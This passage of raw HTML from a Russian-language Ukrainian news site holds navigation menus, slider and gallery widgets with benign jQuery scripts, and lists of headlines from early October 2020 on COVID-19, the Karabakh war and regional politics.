href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li class="current-menu-item"><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/510-armeniya-nanesla-udary-po-mingechaurskoj-tes-pomoshhnik-prezidenta-azerbajdzhana-foto" title="Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО)"><img width="210" height="156" alt="Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО)" src="https://enovosty.com/wp-content/uploads/2020/10/13044571.jpg"></a><a href="https://enovosty.com/news_abroad/full/510-armeniya-nanesla-udary-po-mingechaurskoj-tes-pomoshhnik-prezidenta-azerbajdzhana-foto" title="Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО)" class="name">Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО) <span>(9496)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news-auto/full/510-top-20-samyx-populyarnyx-dizelnyx-avto" title="Топ-20 самых популярных дизельных авто"><img width="210" height="156" alt="Топ-20 самых популярных дизельных авто" src="https://enovosty.com/wp-content/uploads/2020/10/038-1280x720.jpg"></a><a href="https://enovosty.com/news-auto/full/510-top-20-samyx-populyarnyx-dizelnyx-avto" title="Топ-20 самых популярных дизельных авто" class="name">Топ-20 самых популярных дизельных авто <span>(6008)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_society/full/510-ukraina-otkryla-dveri-it-specialistam-iz-belarusi" title="Украина открыла двери IT-специалистам из Беларуси"><img width="210" height="156" alt="Украина открыла двери IT-специалистам из Беларуси" src="https://enovosty.com/wp-content/uploads/2020/10/vatgavvb3eyg4clm4ii12vbhrqi4txnkn616sjne.jpeg"></a><a href="https://enovosty.com/news_society/full/510-ukraina-otkryla-dveri-it-specialistam-iz-belarusi" title="Украина открыла двери IT-специалистам из Беларуси" class="name">Украина открыла двери IT-специалистам из Беларуси <span>(2172)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/510-kiev-zanyal-vtoroe-mesto-v-mirovom-rejtinge-gorodov-s-samym-gryaznym-vozduxom" title="Киев занял второе место в мировом рейтинге городов с самым грязным воздухом"><img width="210" height="156" alt="Киев занял второе место в мировом рейтинге городов с самым грязным воздухом" src="https://enovosty.com/wp-content/uploads/2020/10/image_810xs-e1601832106418.jpg"></a><a href="https://enovosty.com/news_kiev/full/510-kiev-zanyal-vtoroe-mesto-v-mirovom-rejtinge-gorodov-s-samym-gryaznym-vozduxom" title="Киев занял второе место в мировом рейтинге городов с самым грязным воздухом" class="name">Киев занял второе место в мировом рейтинге городов с самым грязным воздухом <span>(5536)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/410-premer-ministr-denis-shmygal-predupredil-ukraincev-ob-otmene-pensij" title="Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий"><img width="210" height="156" alt="Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий" src="https://enovosty.com/wp-content/uploads/2020/09/116492-1_large-1-e1601283129152.jpg"></a><a href="https://enovosty.com/news_society/full/410-premer-ministr-denis-shmygal-predupredil-ukraincev-ob-otmene-pensij" title="Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий" class="name">Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий <span>(8212)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/zdorove/full/410-stalo-izvestno-skolko-ukrainskix-uchitelej-i-shkolnikov-zaboleli-covid-19-video" title="Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО)"><img width="210" height="156" alt="Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/10/image-e1601807461821.jpg"></a><a href="https://enovosty.com/zdorove/full/410-stalo-izvestno-skolko-ukrainskix-uchitelej-i-shkolnikov-zaboleli-covid-19-video" title="Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО)" class="name">Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО) <span>(1272)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/410-v-evropejskoj-strane-ustanovyat-samuyu-vysokuyu-minimalnuyu-zarplatu-v-mire" title="В европейской стране установят самую высокую минимальную зарплату в мире"><img width="210" height="156" alt="В европейской стране установят самую высокую минимальную зарплату в мире" src="https://enovosty.com/wp-content/uploads/2020/10/screenshot_14-e1601742082467.jpg"></a><a href="https://enovosty.com/news_abroad/full/410-v-evropejskoj-strane-ustanovyat-samuyu-vysokuyu-minimalnuyu-zarplatu-v-mire" title="В европейской стране установят самую высокую минимальную зарплату в мире" class="name">В европейской стране установят самую высокую минимальную зарплату в мире <span>(6096)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_technology/full/310-vojna-dronov-v-karabaxe-bpla-obstrelivayut-protivnika-i-sami-prevrashhayutsya-v-bombu" title="Война дронов в Карабахе: БПЛА обстреливают противника и сами превращаются в бомбу"><img width="210" height="156" alt="Война дронов в Карабахе: БПЛА обстреливают противника и сами превращаются в бомбу" src="https://enovosty.com/wp-content/uploads/2020/10/18_06_27_1530121887.jpg"></a><a href="https://enovosty.com/news_technology/full/310-vojna-dronov-v-karabaxe-bpla-obstrelivayut-protivnika-i-sami-prevrashhayutsya-v-bombu" title="Война дронов в Карабахе: БПЛА обстреливают противника и сами превращаются в бомбу" class="name">Война дронов в Карабахе: БПЛА обстреливают противника и сами превращаются в бомбу <span>(8923)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/310-kreml-podderzhav-padayushego-lukashenko-sozdal-lovushku-liliya-shevcova" title="Кремль, поддержав падающего Лукашенко, создал для себя ловушку - Лилия Шевцова"><img width="210" height="156" alt="Кремль, поддержав падающего Лукашенко, создал для себя ловушку - Лилия Шевцова" src="https://enovosty.com/wp-content/uploads/2020/09/lukah.jpg"></a><a href="https://enovosty.com/news_abroad/full/310-kreml-podderzhav-padayushego-lukashenko-sozdal-lovushku-liliya-shevcova" title="Кремль, поддержав падающего Лукашенко, создал для себя ловушку - Лилия Шевцова" class="name">Кремль, поддержав падающего Лукашенко, создал для себя ловушку - Лилия Шевцова <span>(1927)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/zdorove/full/310-obnaruzhen-novyj-ostryj-vospalitelnyj-sindrom-svyazannyj-s-covid-19" title="Обнаружен новый острый воспалительный синдром, связанный с COVID-19"><img width="210" height="156" alt="Обнаружен новый острый воспалительный синдром, связанный с COVID-19" src="https://enovosty.com/wp-content/uploads/2020/09/virus.png"></a><a href="https://enovosty.com/zdorove/full/310-obnaruzhen-novyj-ostryj-vospalitelnyj-sindrom-svyazannyj-s-covid-19" title="Обнаружен новый острый воспалительный синдром, связанный с COVID-19" class="name">Обнаружен новый острый воспалительный синдром, связанный с COVID-19 <span>(6528)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=579&pid=12550" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/no_fotoshop/thumbs/thumbs_20.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Удивительные фото, где нет ни грамма фотошопа"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=579&pid=12550" title="Удивительные фото, где нет ни грамма фотошопа" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Удивительные фото, где нет ни грамма фотошопа</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=578&pid=12513" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/osen/thumbs/thumbs_autumn03-jpg.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Фантастически прекрасная осень"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=578&pid=12513" title="Фантастически прекрасная осень" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Фантастически прекрасная осень</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=577&pid=12499" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/eda1/thumbs/thumbs_carlwarner09-jpg.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Невероятные пейзажи из еды"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=577&pid=12499" title="Невероятные пейзажи из еды" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Невероятные пейзажи из еды</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=576&pid=12480" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/aziat/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="От средневековых японских замков до небоскребов"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=576&pid=12480" title="От средневековых японских замков до небоскребов" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">От средневековых японских замков до небоскребов</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Здоровье</p></div><div class='cls'></div><span class='news_date'>05.10.2020 г.</span><br /><div class="post_news"><span id="post-4820300"><span class="postDate">13:40</span><a class="postTitle" href="https://enovosty.com/zdorove/full/510-uchenye-rasskazali-nuzhno-li-podozrevat-covid-19-pri-nasmorke">Ученые рассказали, нужно ли подозревать COVID-19 при насморке</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4820288"><span class="postDate">13:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/510-izrailskogo-scenariya-ne-budet-v-minzdrave-rasskazali-grozit-li-ukraine-totalnyj-karantin">Израильского сценария не будет: в Минздраве рассказали, грозит ли Украине тотальный карантин</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4820262"><span class="postDate">07:40</span><a class="postTitle" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19">Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>04.10.2020 г.</span><br /><div class="post_news"><span id="post-4820192"><span class="postDate">15:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/410-uchenye-opredelili-opasnejshuyu-mutaciyu-koronavirusa">Ученые определили опаснейшую мутацию коронавируса</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4820188"><span class="postDate">14:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/410-stalo-izvestno-skolko-ukrainskix-uchitelej-i-shkolnikov-zaboleli-covid-19-video">Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4820128"><span class="postDate">11:30</span><a class="postTitle" href="https://enovosty.com/zdorove/full/410-nazvany-novye-nyuansy-covid-19-u-detej-kakie-mogut-byt-simptomy">Названы новые нюансы COVID-19 у детей: какие могут быть симптомы</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4820106"><span class="postDate">08:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/410-vrach-iz-izrailya-rasskazal-u-kogo-tochno-ne-poyavitsya-oslozhnenij-ot-covid-19">Врач из Израиля рассказал, у кого точно не появятся осложнения от COVID-19</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/zdorove">Все здоровье</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">03.10.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/310-novyj-karabaxskij-vzryv-otkuda-eto-poshlo-i-komu-eto-vygodno">Новый Карабахский взрыв: кому это выгодно, причины и последствия</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/310-novyj-karabaxskij-vzryv-otkuda-eto-poshlo-i-komu-eto-vygodno"><img width="230" alt="Новый Карабахский взрыв: кому это выгодно, причины и последствия" src="/wp-content/uploads/2020/10/armeniya_azerbaydjan.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/310-novyj-karabaxskij-vzryv-otkuda-eto-poshlo-i-komu-eto-vygodno">Новый взрыв кровопролития в Закавказье по линии противостояния Армения-Азербайджан был ожидаемым, но оказался неожиданным, хотя первые ласточки нынешней ...</a></span></div><div class="block"><div class="info"><span class="postDate">30.09.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/finance/full/3009-bankovskaya-tajna-kto-budet-imet-dostup-k-schetam-ukraincev">Банковская тайна: кто будет иметь доступ к счетам украинцев</a></p><div class="cblock"><a href="https://enovosty.com/finance/full/3009-bankovskaya-tajna-kto-budet-imet-dostup-k-schetam-ukraincev"><img width="230" alt="Банковская тайна: кто будет иметь доступ к счетам украинцев" src="/wp-content/uploads/2020/09/bankovskaya_tayna.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/finance/full/3009-bankovskaya-tajna-kto-budet-imet-dostup-k-schetam-ukraincev">"Зеленый принтер" хоть и сбоит непрерывно, работая в аварийном режиме, но не перестает выдавать на-гора разного рода нормотворческий трэш под внешне ...</a></span></div><div class="block"><div class="info"><span class="postDate">30.09.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/3009-itogi-sentyabrya-koronavirusnaya-strategiya-mira-predchuvstvie-bolshoj-vojny-i-tuchi-nad-amerikoj">Итоги сентября: Коронавирусная стратегия мира, предчувствие большой войны и тучи над Америкой</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/3009-itogi-sentyabrya-koronavirusnaya-strategiya-mira-predchuvstvie-bolshoj-vojny-i-tuchi-nad-amerikoj"><img width="230" alt="Итоги сентября: Коронавирусная стратегия мира, предчувствие большой войны и тучи над Америкой" src="/wp-content/uploads/2020/09/52826063_101-e1601478558324.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/3009-itogi-sentyabrya-koronavirusnaya-strategiya-mira-predchuvstvie-bolshoj-vojny-i-tuchi-nad-amerikoj">ЕС посылает Киеву предупредительные "сигналы", возле Чугуева Харьковской области потерпел крушение самолёт АН-26 с курсантами на борту, а дискуссии вокруг ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>05.10.2020 г.</span><br /><div class="post_news"> <span id="post-4820333"> <span class="postDate">16:14</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/510-aleksandr-leonov-v-ukraine-neobxodimo-provodit-pensionnuyu-reformu-i-vvodit-nakopitelnuyu-sistemu">Александр Леонов: "В Украине необходимо проводить пенсионную реформу и вводить накопительную систему"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820335"> <span class="postDate">16:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-v-moej-smerti-proshu-vinit-rossijskuyu-federaciyu-v-rossii-formiruetsya-protest">"В моей смерти прошу винить Российскую Федерацию": В России формируется протест</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820334"> <span class="postDate">15:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-zhestkij-karantin-iz-za-koronavirusa-ukraincam-rasskazali-k-chemu-gotovitsya">Жесткий карантин из-за коронавируса: Украинцам рассказали, к чему готовиться</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820332"> <span class="postDate">15:36</span>  <a class="postTitle orang" href="https://enovosty.com/news_politics/full/510-vojna-v-karabaxe-azerbajdzhan-obratilsya-k-ukraine">Война в Карабахе: Азербайджан обратился к Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820329"> <span class="postDate">15:33</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/510-bomba-dlya-kremlya-ozvuchena-vazhnost-resheniya-suda-po-yanukovichu">"Бомба для Кремля": Озвучена важность решения суда по Януковичу</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820326"> <span class="postDate">15:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-eto-nepravilnyj-vodomyot-yolkin-podelilsya-svezhej-karikaturoj-s-lukashenko">"Это неправильный водомёт": Ёлкин поделился свежей карикатурой с Лукашенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820271"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-lyubopytnyj-belyj-medved-povredil-kanadskij-spasatelnyj-vertolet-foto">Любопытный белый медведь повредил канадский спасательный вертолет (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820325"> <span class="postDate">14:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-detali-razgovora-putina-i-klintona-posle-gibeli-kurska-stali-dostoyaniem-obshhestvennosti">Детали разговора Путина и Клинтона после гибели "Курска" стали достоянием общественности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820324"> <span class="postDate">14:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-v-rf-pytayutsya-vtyanut-ukrainu-v-karabaxskij-konflikt-bloger">В РФ пытаются втянуть Украину в карабахский конфликт, - блогер</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820323"> <span class="postDate">14:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-poltava-vzbuntovalas-protiv-karantina-kabminu-vydvinuli-zhestkij-ultimatum">Полтава взбунтовалась против карантина. Кабмину выдвинули жесткий ультиматум</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820322"> <span class="postDate">14:18</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-stepanov-sdelal-trevozhnyj-prognoz-po-covid-19-v-ukraine">Степанов сделал тревожный прогноз по Covid-19 в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820321"> <span class="postDate">14:16</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/510-rossiya-vtroe-uvelichila-voennoe-prisutstvie-v-krymu-dalee-kolonizaciya-mid">Россия втрое увеличила военное присутствие в Крыму. Далее - колонизация, - МИД</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820300"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/510-uchenye-rasskazali-nuzhno-li-podozrevat-covid-19-pri-nasmorke">Ученые рассказали, нужно ли подозревать COVID-19 при насморке</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820298"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/510-izrailskaya-kompaniya-predstavila-karmannyj-razvedyvatelnyj-bespilotnik">Израильская компания представила карманный разведывательный беспилотник</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820288"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/510-izrailskogo-scenariya-ne-budet-v-minzdrave-rasskazali-grozit-li-ukraine-totalnyj-karantin">Израильского сценария не будет: в Минздраве рассказали, грозит ли Украине тотальный карантин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820317"> <span class="postDate">12:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-uchenye-nashli-dokazatelstva-unichtozheniya-celogo-goroda-v-drevnej-ispanii">Ученые нашли доказательства уничтожения целого города в древней Испании</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820315"> <span class="postDate">12:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-sukhoi-superjet-100-zhirnaya-tochka-na-razdutyx-nadezhdax-grazhdanskogo-aviastroeniya-rf-zloj-odessit">Sukhoi Superjet 100: жирная точка на раздутых надеждах гражданского авиастроения РФ, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820294"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-novoe-karantinnoe-zonirovanie-v-ukraine-kto-popal-v-krasnuyu-zonu">Новое карантинное зонирование в Украине: кто попал в красную зону</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820311"> <span class="postDate">11:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-rynochnyj-kapitalizm-v-usloviyax-pandemii-poterpel-neudachu-i-nuzhdaetsya-v-reforme">Рыночный капитализм в условиях пандемии потерпел неудачу и нуждается в реформе, - Папа Франциск</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820296"> <span class="postDate">11:23</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-v-parizhe-zakryvayutsya-bary-i-restorany-iz-za-covid-19">В Париже закрываются бары и рестораны из-за COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820289"> <span class="postDate">11:09</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/510-s-detstva-na-mersedese-mercedes-benz-nachal-vypuskat-detskie-kolyaski">"С детства на мерседесе": Mercedes-Benz начал выпускать детские коляски (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820270"> <span class="postDate">10:41</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-covid-19-v-ukraine-uzhe-v-11-oblastyax-bolnicy-zapolneny-bolee-chem-na-50">COVID-19: в Украине уже в 11 областях больницы заполнены более, чем на 50%</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820272"> <span class="postDate">10:37</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/510-na-lichnyj-piar-mera-v-krivom-roge-115-mln-byudzhetnyx-griven-napravili-firmam-iz-okruzheniya-vilkula-rassledovanie">В Кривом Роге 11,5 млн бюджетных гривен направили фирмам из окружения Вилкула, – расследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820263"> <span class="postDate">10:15</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/510-prezentovan-elektrogiperkar-budushhego-foto">Презентован электрогиперкар будущего (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820259"> <span class="postDate">09:56</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-armeniya-nanesla-udary-po-mingechaurskoj-tes-pomoshhnik-prezidenta-azerbajdzhana-foto">Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820257"> <span class="postDate">09:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-v-ssha-armyanskie-protestuyushhie-perekryvayut-dorogu-v-gollivud">В США армянские протестующие перекрывают Голливудский бульвар, - Fox News (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820252"> <span class="postDate">09:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-sbu-blokirovala-nelegalnyj-vyvoz-drevesiny-iz-ukrainy-v-aziyu">СБУ блокировала нелегальный вывоз древесины из Украины в Азию</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820249"> <span class="postDate">08:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-potoki-vody-snosyat-doma-i-ubivayut-lyudej-na-franciyu-obrushilos-navodnenie-video">Потоки воды сносят дома и убивают людей: на Францию обрушилось наводнение (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820247"> <span class="postDate">08:28</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/510-top-20-samyx-populyarnyx-dizelnyx-avto">Топ-20 самых популярных дизельных авто</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820245"> <span class="postDate">08:09</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-ukraina-otkryla-dveri-it-specialistam-iz-belarusi">Украина открыла двери IT-специалистам из Беларуси</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820243"> <span class="postDate">07:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-illarionov-rasskazal-o-dalnejshej-sudbe-lukashenko">Илларионов рассказал о дальнейшей судьбе 